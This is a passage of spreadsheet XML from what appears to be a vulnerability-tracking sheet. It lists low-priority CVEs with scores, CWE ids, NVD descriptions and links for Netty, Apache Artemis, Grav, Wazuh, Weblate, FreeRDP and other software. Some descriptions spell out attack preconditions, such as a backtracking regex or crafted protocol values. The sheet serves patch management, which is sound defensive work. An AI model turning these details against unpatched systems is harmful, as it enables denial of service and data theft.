          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, the RedisArrayAggregator Redis codec clears retained partial aggregate state when the maxNestedArrayDepth limit is exceeded, but it does not clear the same state when the sibling maxElements limit is exceeded. A peer can start a valid RESP array, send a bulk string child, then send a nested array header longer than the configured maxElements. Netty throws a decoder exception in decodeRedisArrayHeader, but the existing partial aggregate remains retained in the handler. If the application leaves the channel alive after the exception, later messages are still consumed into the pre-error aggregate, allowing an unauthenticated peer to keep attacker-controlled aggregate state alive across a security-limit exception and pin retained pooled buffers. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M3900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56818</t>
        </is>
      </c>
    </row>
    <row r="3901">
      <c r="A3901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57822</t>
        </is>
      </c>
      <c r="C3901" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3901" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3901" s="5" t="inlineStr"/>
      <c r="F3901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3901" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H3901" s="5" t="inlineStr"/>
      <c r="I3901" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3901" s="5" t="inlineStr"/>
      <c r="K3901" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L3901" s="5" t="inlineStr">
        <is>
          <t>When the broker is processing message-based management requests, sent by an authenticated messaging client that is authorized with MANAGE permission to perform management-via-messaging, the parameter processing can trigger Java deserialization of certain method parameters that the broker will not utilise. The permitted types allow to craft a payload causing excessive computation and pinning the processing thread, leading to denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.3.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M3901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57822</t>
        </is>
      </c>
    </row>
    <row r="3902">
      <c r="A3902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58649</t>
        </is>
      </c>
      <c r="C3902" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3902" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3902" s="5" t="inlineStr"/>
      <c r="F3902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3902" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H3902" s="5" t="inlineStr"/>
      <c r="I3902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3902" s="5" t="inlineStr"/>
      <c r="K3902" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L3902" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t>
        </is>
      </c>
    </row>
    <row r="3903">
      <c r="A3903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59903</t>
        </is>
      </c>
      <c r="C3903" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3903" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3903" s="5" t="inlineStr"/>
      <c r="F3903" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3903" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H3903" s="5" t="inlineStr"/>
      <c r="I3903" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3903" s="5" t="inlineStr"/>
      <c r="K3903" s="5" t="inlineStr">
        <is>
          <t>CWE-524</t>
        </is>
      </c>
      <c r="L3903" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.http.cors.CorsHandler setVaryHeader replaces application Vary headers such as Authorization or Cookie with Origin, allowing a caching proxy or CDN to reuse authenticated responses across users and disclose sensitive information. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M3903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59903</t>
        </is>
      </c>
    </row>
    <row r="3904">
      <c r="A3904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61688</t>
        </is>
      </c>
      <c r="C3904" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3904" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3904" s="5" t="inlineStr"/>
      <c r="F3904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3904" s="5" t="inlineStr"/>
      <c r="H3904" s="5" t="inlineStr"/>
      <c r="I3904" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3904" s="5" t="inlineStr"/>
      <c r="K3904" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3904" s="5" t="inlineStr">
        <is>
          <t>SolidInvoice is an open-source invoicing platform. Prior to version 3.0.1, an authenticated user can view the API request history of any other user's API tokens within the same company by manipulating two writable Symfony UX LiveComponent props on the `DataGrid` component. Version 3.0.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M3904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61688</t>
        </is>
      </c>
    </row>
    <row r="3905">
      <c r="A3905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61690</t>
        </is>
      </c>
      <c r="C3905" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3905" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3905" s="5" t="inlineStr"/>
      <c r="F3905" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3905" s="5" t="inlineStr"/>
      <c r="H3905" s="5" t="inlineStr"/>
      <c r="I3905" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3905" s="5" t="inlineStr"/>
      <c r="K3905" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3905" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.1, Grav ZipArchiver::extract() in system/src/Grav/Common/Filesystem/ZipArchiver.php passes archives to ZipArchive::extractTo() without enforcing the system.gpm.archive uncompressed-size, file-count, or nesting-depth limits. Code using Archiver::create('zip') to extract an attacker-controlled archive can exhaust disk space or inodes and make the site unavailable. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="M3905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61690</t>
        </is>
      </c>
    </row>
    <row r="3906">
      <c r="A3906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61802</t>
        </is>
      </c>
      <c r="C3906" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3906" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3906" s="5" t="inlineStr"/>
      <c r="F3906" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3906" s="5" t="inlineStr"/>
      <c r="H3906" s="5" t="inlineStr"/>
      <c r="I3906" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3906" s="5" t="inlineStr"/>
      <c r="K3906" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L3906" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.14.0 through 4.14.6, a low-privilege API user can read the cleartext cluster key from a configuration endpoint that fails to redact it. The REST API provides a masking control, mask_sensitive_config, that redacts sensitive fields such as authd.pass and cluster.key from configuration responses for users who lack update-config permission, and every config-read endpoint carries this decorator except GET /cluster/local/config. That endpoint, backed by read_config_wrapper, is gated only by cluster:read and returns the local node's cluster configuration including the cleartext key, whereas its siblings return the same value masked. As a result, any account with the default readonly or cluster_readonly role, which is explicitly denied update-config precisely so it cannot view secrets, receives the real cluster key. Because the cluster key authenticates and encrypts traffic between cluster nodes, disclosing it to an unprivileged account provides the authentication precondition for the cluster-peer remote code execution chains established by prior advisories. This issue is fixed in version 4.14.</t>
        </is>
      </c>
      <c r="M3906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61802</t>
        </is>
      </c>
    </row>
    <row r="3907">
      <c r="A3907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61842</t>
        </is>
      </c>
      <c r="C3907" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3907" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3907" s="5" t="inlineStr"/>
      <c r="F3907" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3907" s="5" t="inlineStr"/>
      <c r="H3907" s="5" t="inlineStr"/>
      <c r="I3907" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3907" s="5" t="inlineStr"/>
      <c r="K3907" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3907" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.2, the Grav Twig content sandbox permits grav.offsetGet('config') to return the raw configuration object and permits json_encode, print_r, yaml_encode, and string filters to serialize that object without passing through GravSecurityPolicy::checkMethodAllowed. A user with page-author permissions can render sandboxed content that exposes plugins.* configuration secrets, including SMTP credentials, API keys, and plugin database credentials. This issue is fixed in version 2.0.2.</t>
        </is>
      </c>
      <c r="M3907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61842</t>
        </is>
      </c>
    </row>
    <row r="3908">
      <c r="A3908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62326</t>
        </is>
      </c>
      <c r="C3908" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3908" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3908" s="5" t="inlineStr"/>
      <c r="F3908" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3908" s="5" t="inlineStr"/>
      <c r="H3908" s="5" t="inlineStr"/>
      <c r="I3908" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3908" s="5" t="inlineStr"/>
      <c r="K3908" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3908" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a user with the built-in "Edit source" role can store a malicious regular expression in a source string's flags that is executed without any timeout, allowing them to stall requests and deny service. Regular expressions supplied through the regex: quality check and regex placeholders are compiled during validation but later run against translation content in RegexCheck and PlaceholderCheck with no time limit, so a catastrophic-backtracking pattern like ^(a|aa)+$ can consume CPU indefinitely. Because Weblate re-runs these checks for every linked target unit in the same request when a source unit's flags change, a single edit can trigger sustained CPU-bound denial of service. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M3908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62326</t>
        </is>
      </c>
    </row>
    <row r="3909">
      <c r="A3909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62437</t>
        </is>
      </c>
      <c r="C3909" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3909" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3909" s="5" t="inlineStr"/>
      <c r="F3909" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3909" s="5" t="inlineStr"/>
      <c r="H3909" s="5" t="inlineStr"/>
      <c r="I3909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3909" s="5" t="inlineStr"/>
      <c r="K3909" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3909" s="5" t="inlineStr">
        <is>
          <t>When guests are terminated, various pieces of cleanup need carrying out.
The cleaning up of PCI devices which were assigned to guests, and the
associated removal of tracking structures for IRQs used by the devices
occurs relatively early in the process.  Unfortunately after that point
the guest about to be terminated could cause its device model (DM) to
re-establish such tracking structures, by having it bind one or more IRQs
anew.  While some of those tracking structures would still be cleaned up
later on, at least one would not be.</t>
        </is>
      </c>
      <c r="M3909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62437</t>
        </is>
      </c>
    </row>
    <row r="3910">
      <c r="A3910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62762</t>
        </is>
      </c>
      <c r="C3910" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3910" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3910" s="5" t="inlineStr"/>
      <c r="F3910" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G3910" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H3910" s="5" t="inlineStr"/>
      <c r="I3910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3910" s="5" t="inlineStr"/>
      <c r="K3910" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3910" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t>
        </is>
      </c>
    </row>
    <row r="3911">
      <c r="A3911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="C3911" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3911" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3911" s="5" t="inlineStr"/>
      <c r="F3911" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3911" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3911" s="5" t="inlineStr"/>
      <c r="I3911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3911" s="5" t="inlineStr"/>
      <c r="K3911" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3911" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M3911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="3912">
      <c r="A3912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63117</t>
        </is>
      </c>
      <c r="C3912" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3912" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3912" s="5" t="inlineStr"/>
      <c r="F3912" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3912" s="5" t="inlineStr"/>
      <c r="H3912" s="5" t="inlineStr"/>
      <c r="I3912" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3912" s="5" t="inlineStr"/>
      <c r="K3912" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L3912" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.28.0, an authenticated RDP client can advertise DVI ADPCM with nBlockAlign equal to 8 and nChannels equal to 2 to make the `bs` calculation in rdpsnd_server_select_format in channels/rdpsnd/server/rdpsnd_main.c equal zero. The subsequent out_frames modulo `bs` operation raises SIGFPE and terminates the server-side rdpsnd channel process. This vulnerability fixed in 3.28.0.</t>
        </is>
      </c>
      <c r="M3912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63117</t>
        </is>
      </c>
    </row>
    <row r="3913">
      <c r="A3913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63123</t>
        </is>
      </c>
      <c r="C3913" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3913" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3913" s="5" t="inlineStr"/>
      <c r="F3913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3913" s="5" t="inlineStr"/>
      <c r="H3913" s="5" t="inlineStr"/>
      <c r="I3913" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3913" s="5" t="inlineStr"/>
      <c r="K3913" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3913" s="5" t="inlineStr">
        <is>
          <t>Tina is a headless content management system. Prior to 2.5.2, the TinaCMS CLI package's Vite dev server packages/@tinacms/cli/src/next/vite/cors.ts origin callback returns false for a disallowed origin but does not reject the request, and packages/@tinacms/cli/src/next/vite/plugins.ts still routes POST /media/upload/* to mediaRouter.handlePost. The upload code in packages/@tinacms/cli/src/next/commands/dev-command/server/media.ts writes attacker-controlled multipart contents inside the configured media root. A remote attacker can cause a developer's browser to submit this state-changing request by inducing the developer to visit an attacker-controlled page while tinacms dev is running. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M3913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63123</t>
        </is>
      </c>
    </row>
    <row r="3914">
      <c r="A3914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63133</t>
        </is>
      </c>
      <c r="C3914" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3914" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3914" s="5" t="inlineStr"/>
      <c r="F3914" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3914" s="5" t="inlineStr"/>
      <c r="H3914" s="5" t="inlineStr"/>
      <c r="I3914" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3914" s="5" t="inlineStr"/>
      <c r="K3914" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3914" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. Prior to version 26.07.0, `safe-extract.py` extracts uploaded archives with no limit on entry count, directory depth, total entries, or output size. A small malicious archive containing a large number of directory or file entries causes the filebeat processing container to create an unbounded number of filesystem objects, exhausting inodes or filesystem metadata and denying service to the processing pipeline and any service sharing the same mount. Version 26.07.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M3914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63133</t>
        </is>
      </c>
    </row>
    <row r="3915">
      <c r="A3915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63523</t>
        </is>
      </c>
      <c r="C3915" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3915" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3915" s="5" t="inlineStr"/>
      <c r="F3915" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3915" s="5" t="inlineStr"/>
      <c r="H3915" s="5" t="inlineStr"/>
      <c r="I3915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3915" s="5" t="inlineStr"/>
      <c r="K3915" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3915" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M3915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t>
        </is>
      </c>
    </row>
    <row r="3916">
      <c r="A3916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63667</t>
        </is>
      </c>
      <c r="C3916" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3916" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3916" s="5" t="inlineStr"/>
      <c r="F3916" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3916" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3916" s="5" t="inlineStr"/>
      <c r="I3916" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3916" s="5" t="inlineStr"/>
      <c r="K3916" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3916" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. Prior to 3.6.2, the import-export module in packages/import-export/lib/formats/gzip.js constructs an attachment source path from the attacker-controlled _id, name, and extension fields in aposAttachments.json without ensuring that the resolved path remains under the extracted attachments directory, allowing an authenticated contributor to import a crafted archive, read a host file with an allowed extension, and publish the copied file at an unauthenticated uploads URL. This issue is fixed in version 3.6.2.</t>
        </is>
      </c>
      <c r="M3916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63667</t>
        </is>
      </c>
    </row>
    <row r="3917">
      <c r="A3917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63669</t>
        </is>
      </c>
      <c r="C3917" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3917" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3917" s="5" t="inlineStr"/>
      <c r="F3917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3917" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3917" s="5" t="inlineStr"/>
      <c r="I3917" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3917" s="5" t="inlineStr"/>
      <c r="K3917" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L3917" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. Prior to 4.32.0, the page module's move() operation fails to enforce the destination parent's _create permission because its oldParent archive condition disables the check for ordinary moves, allowing an authenticated editor or contributor to use _targetId and _position through the page REST update endpoint to move a controlled page into a restricted subtree and make nudgeNewPeers() updateMany re-rank protected sibling pages. This issue is fixed in version 4.32.0.</t>
        </is>
      </c>
      <c r="M3917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63669</t>
        </is>
      </c>
    </row>
    <row r="3918">
      <c r="A3918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64662</t>
        </is>
      </c>
      <c r="C3918" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3918" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3918" s="5" t="inlineStr"/>
      <c r="F3918" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3918" s="5" t="inlineStr"/>
      <c r="H3918" s="5" t="inlineStr"/>
      <c r="I3918" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3918" s="5" t="inlineStr"/>
      <c r="K3918" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L3918" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.1 and 6.24.0, an authenticated Control Panel user could view content from entries they did not have permission to view, including entry content and custom field values, from any collection and including unpublished entries, through the navigation endpoint, though no data could be modified. This issue is fixed in versions 5.74.1 and 6.24.0.</t>
        </is>
      </c>
      <c r="M3918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64662</t>
        </is>
      </c>
    </row>
    <row r="3919">
      <c r="A3919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64663</t>
        </is>
      </c>
      <c r="C3919" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3919" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3919" s="5" t="inlineStr"/>
      <c r="F3919" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3919" s="5" t="inlineStr"/>
      <c r="H3919" s="5" t="inlineStr"/>
      <c r="I3919" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3919" s="5" t="inlineStr"/>
      <c r="K3919" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L3919" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.1 and 6.24.0, manipulating user-supplied input incorporated into Antlers templates could result in the loss of content and assets, on sites whose templates pass untrusted input into affected areas, and exploitation did not require authentication. This issue is fixed in versions 5.74.1 and 6.24.0.</t>
        </is>
      </c>
      <c r="M3919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64663</t>
        </is>
      </c>
    </row>
    <row r="3920">
      <c r="A3920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64918</t>
        </is>
      </c>
      <c r="C3920" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3920" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3920" s="5" t="inlineStr"/>
      <c r="F3920" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3920" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3920" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3920" s="5" t="inlineStr"/>
      <c r="K3920" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3920" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M3920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t>
        </is>
      </c>
    </row>
    <row r="3921">
